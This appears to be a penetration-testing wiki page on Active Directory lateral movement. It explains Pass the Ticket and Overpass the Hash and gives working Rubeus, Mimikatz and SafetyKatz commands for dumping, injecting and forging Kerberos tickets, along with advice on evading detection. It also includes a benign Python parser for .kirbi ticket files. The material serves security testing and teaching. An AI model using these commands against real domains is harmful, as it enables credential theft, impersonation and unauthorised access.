Lateral Movement

Introduction

This section collects techniques for moving laterally through an Active Directory environment once you hold Kerberos material (a ticket or a key) for some user: reusing tickets as they are, turning a key into a ticket, and the delegation tricks that are detailed on the Kerberos exploitation page.

Pass The Ticket (PTT)

In Pass the Ticket the attacker reuses a Kerberos ticket that was issued to someone else: a ticket-granting ticket (TGT) or a service ticket stolen from a user's logon session or extracted from a machine's LSASS memory (for example with Mimikatz sekurlsa::tickets /export or Rubeus dump, both of which need local admin). A stolen TGT lets the attacker request service tickets as that user without knowing the password or hash; a stolen service ticket only grants access to the service named in it, for as long as it is valid.
With Rubeus the ticket is injected into a fresh, "sacrificial" logon session so that the tickets of your current session stay untouched:
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
The username and password given to createnetonly are never validated against the domain (network-credentials-only logon), so the fake password is fine. To inject into the current logon session instead, use .\Rubeus.exe ptt /ticket:<TICKET>. In either case, klist in the target process should show the imported ticket. What you can do with a ticket depends on the service class in its SPN (the sname of a service ticket), as summarised in the table below.

Tickets - Techniques

Service Type                                  Required Tickets
--------------------------------------------  ------------------------------------------------
Windows File Share (PsExec)                   CIFS
LDAP Operations (DCSync)                      LDAP
WinRM                                         HOST, HTTP, WINRM
WMI                                           HOST, RPCSS
PowerShell Remoting                           HOST, HTTP; depending on OS also WSMAN, RPCSS
Scheduled Tasks                               HOST
Windows Remote Server Administration Tools    RPCSS, LDAP, CIFS
Golden Tickets                                krbtgt
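Before picking a row from the table it helps to check what a captured ticket actually is. The following is an added example, not code from this page, Rubeus or Mimikatz: a standard-library-only Python parser for the base64 KRB-CRED (.kirbi) blob that Rubeus prints with /nowrap (a Mimikatz .kirbi file has the same structure; base64-encode it first). It reads the clear-text realm and sname of each ticket and maps the SPN's service class onto the table above; the encrypted part is not decrypted. The realm CORP.LOCAL, the host names and the dummy encrypted bytes in build_sample_kirbi are constructed sample data. On a Windows host, Rubeus's own describe command gives the same information.

```python
"""Inspect a base64 KRB-CRED (.kirbi) and say which table row applies.

Added example (not Rubeus/Mimikatz code): a minimal DER reader for the
ASN.1 used by KRB-CRED (RFC 4120 5.8.1) and Ticket (5.3). Only the
clear-text fields (realm, sname) are read; the encrypted part is untouched.
"""
import base64

# Service class of the ticket's SPN -> lateral-movement use (the page's table)
TICKET_USES = {
    "cifs":   "Windows File Share (PsExec); part of RSAT",
    "ldap":   "LDAP operations (DCSync); part of RSAT",
    "host":   "Scheduled Tasks; part of WinRM, WMI, PowerShell Remoting",
    "http":   "WinRM; PowerShell Remoting",
    "wsman":  "PowerShell Remoting (OS dependent)",
    "rpcss":  "WMI; PowerShell Remoting (OS dependent); RSAT",
    "krbtgt": "TGT: can request service tickets for any of the above",
}

def _read_tlv(buf, pos=0):
    """Read one DER TLV at buf[pos] -> (tag, value, next_pos). Low-tag form only."""
    tag, pos = buf[pos], pos + 1
    length, pos = buf[pos], pos + 1
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _children(buf):
    """All (tag, value) pairs inside a constructed value."""
    out, pos = [], 0
    while pos < len(buf):
        tag, val, pos = _read_tlv(buf, pos)
        out.append((tag, val))
    return out

def _ctx(children, n):
    """Value of context-specific field [n] (tag byte 0xA0 | n)."""
    for tag, val in children:
        if tag == 0xA0 | n:
            return val
    raise ValueError(f"missing field [{n}]")

def parse_kirbi(b64):
    """Return [{realm, sname, use}] for every Ticket inside a base64 KRB-CRED."""
    tag, cred, _ = _read_tlv(base64.b64decode(b64))
    if tag != 0x76:                        # [APPLICATION 22] KRB-CRED
        raise ValueError(f"not a KRB-CRED (outer tag 0x{tag:02x})")
    fields = _children(_read_tlv(cred)[1])              # KRB-CRED SEQUENCE
    tickets = _children(_read_tlv(_ctx(fields, 2))[1])  # [2] SEQUENCE OF Ticket
    out = []
    for tag, body in tickets:
        if tag != 0x61:                    # [APPLICATION 1] Ticket
            raise ValueError(f"unexpected ticket tag 0x{tag:02x}")
        tf = _children(_read_tlv(body)[1])
        realm = _read_tlv(_ctx(tf, 1))[1].decode("ascii")     # [1] realm
        sname = _children(_read_tlv(_ctx(tf, 2))[1])          # [2] PrincipalName
        names = _children(_read_tlv(_ctx(sname, 1))[1])       # [1] name-string
        parts = [v.decode("ascii") for _, v in names]
        out.append({"realm": realm, "sname": "/".join(parts),
                    "use": TICKET_USES.get(parts[0].lower(), "not in the table")})
    return out

# --- constructed sample data (tiny DER encoder) so the parser runs offline ---
def _tlv(tag, value):
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def _int(v):  return _tlv(0x02, bytes([v]))          # small positive INTEGERs only
def _gstr(s): return _tlv(0x1B, s.encode("ascii"))   # GeneralString
def _ctx_tlv(n, inner): return _tlv(0xA0 | n, inner)

def build_sample_kirbi(realm, spn, cipher=b"\x00" * 48):
    """KRB-CRED with one Ticket; encrypted parts are dummy bytes (fake data)."""
    sname = _tlv(0x30, _ctx_tlv(0, _int(2)) +            # name-type 2 (NT-SRV-INST)
                 _ctx_tlv(1, _tlv(0x30, b"".join(_gstr(p) for p in spn.split("/")))))
    enc = _tlv(0x30, _ctx_tlv(0, _int(18)) + _ctx_tlv(2, _tlv(0x04, cipher)))  # etype 18
    ticket = _tlv(0x61, _tlv(0x30, _ctx_tlv(0, _int(5)) + _ctx_tlv(1, _gstr(realm))
                                 + _ctx_tlv(2, sname) + _ctx_tlv(3, enc)))
    cred = _tlv(0x30, _ctx_tlv(0, _int(5)) + _ctx_tlv(1, _int(22))
                      + _ctx_tlv(2, _tlv(0x30, ticket)) + _ctx_tlv(3, enc))
    return base64.b64encode(_tlv(0x76, cred)).decode("ascii")

if __name__ == "__main__":
    import sys
    blob = sys.argv[1] if len(sys.argv) > 1 else build_sample_kirbi("CORP.LOCAL", "cifs/FS01.corp.local")
    for t in parse_kirbi(blob):
        print(f"{t['realm']}  {t['sname']}  ->  {t['use']}")
```

Run it with the /nowrap string as the only argument (python3 kirbi_info.py '<BASE64>'); with no argument it decodes the constructed sample. A TGT shows up as krbtgt/<REALM> and fits every row; a service ticket for an SPN class that is not in the table (e.g. mssqlsvc) is reported as such rather than mapped to a use it does not have.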

Overpass The Hash (OTH)

Overpass the Hash (also called pass the key) turns a user's Kerberos key into a TGT. The NTLM hash is the user's RC4-HMAC key, and the AES128/AES256 keys are derived from the password, so any of them is enough to complete pre-authentication and obtain a TGT, which is then used exactly as in Pass the Ticket. Prefer the AES256 key when you have it: an AS-REQ offering only RC4 for an account that supports AES is a common detection signal.
  • Does not require high privileges (Rubeus talks to the KDC directly; the sacrificial logon session keeps your own tickets untouched)
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USER> /password:FakePass123 /show
.\Rubeus.exe asktgt /user:<USER> /domain:<DOMAIN> [/aes256:<AES256_KEY>|/ntlm:<HASH_NTLM>|/rc4:<RC4_KEY>] /opsec /nowrap /luid:<LUID_FROM_CREATENETONLY> /ptt
/ntlm and /rc4 are the same key (the NT hash). /opsec makes the request look like one from a Windows client and is meant to be used with the AES256 key. Drop /luid to inject the TGT into the current logon session instead.
  • Requires high privileges (the key is patched into LSASS, so local admin/SYSTEM is needed)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<AES256_KEY> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<AES256_KEY> /run:cmd.exe" "exit"
The spawned process holds no TGT until it touches a Kerberos service (for example dir \\<DC>\C$), which triggers the AS-REQ with the injected key; klist in that process then shows the ticket.

S4U2Self Abuse (Constrained Delegation)

An account with an SPN can ask the KDC for a service ticket to itself on behalf of any user (S4U2Self); combined with constrained delegation (S4U2Proxy) this yields a ticket to the delegated service as that user. The exploitation is covered on the Kerberos exploitation page.

Alternate Service Name (Constrained Delegation)

The service name (sname) of a service ticket is not part of its encrypted portion, so a ticket obtained for one service on a host (e.g. cifs) can be rewritten for another service on the same host (e.g. ldap or host) with the Rubeus /altservice option. The exploitation is covered on the Kerberos exploitation page.
